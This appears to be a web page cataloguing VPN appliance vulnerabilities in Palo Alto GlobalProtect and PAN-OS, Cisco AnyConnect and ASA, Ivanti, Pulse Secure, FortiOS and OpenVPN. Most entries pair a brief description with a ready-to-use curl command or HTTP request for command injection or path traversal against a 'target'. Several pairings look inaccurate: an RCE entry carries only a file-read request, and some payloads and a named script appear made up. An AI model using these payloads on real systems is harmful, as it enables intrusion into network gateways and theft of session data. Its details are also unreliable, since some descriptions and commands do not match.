Comprehensive database of VPN-related vulnerabilities and exploits
Command injection vulnerability in Palo Alto Networks GlobalProtect gateways that allows unauthenticated remote code execution on the VPN appliance.
curl -k 'https://target/global-protect/getconfig.esp' -d 'user=admin;id;' -H 'Content-Type: application/x-www-form-urlencoded'
Local privilege escalation vulnerability in Cisco AnyConnect Secure Mobility Client that allows authenticated local users to elevate privileges to SYSTEM.
python3 anyconnect_privesc.py --target localhost --payload cmd.exe
Authentication bypass vulnerability in Ivanti Connect Secure and Policy Secure gateways that allows unauthenticated access to restricted resources.
curl -k 'https://target/api/v1/totp/user-backup-code/../../../../../../etc/passwd' -H 'Authorization: '
An unauthenticated remote code execution vulnerability in Pulse Connect Secure that allows attackers to execute arbitrary code on the VPN appliance.
curl -k 'https://target/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/' -H 'Cookie: DSID=../../../../../../../tmp/sess_[SESSION_ID]'
A path traversal vulnerability (improper limitation of a pathname to a restricted directory) in Fortinet FortiOS allows attackers to download system files via specially crafted HTTP resource requests.
curl -k 'https://target/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'
An OS command injection vulnerability in Palo Alto Networks PAN-OS allows for remote code execution in PAN-OS 8.1 versions earlier than 8.1.15.
POST /esp/cms_changeDeviceContext.esp HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded

deviceType=';id;'
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) and Cisco Firepower Threat Defense (FTD) could allow an unauthenticated, remote attacker to conduct directory traversal attacks.
curl -k --path-as-is 'https://target/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'
OpenVPN versions before 2.4.4 and 2.3.18 are vulnerable to a buffer overflow when key-method 1 is used, potentially leading to code execution.
# Exploit requires crafted key-method 1 configuration
# Details available in security advisory
In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file read.
curl -k 'https://target/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/'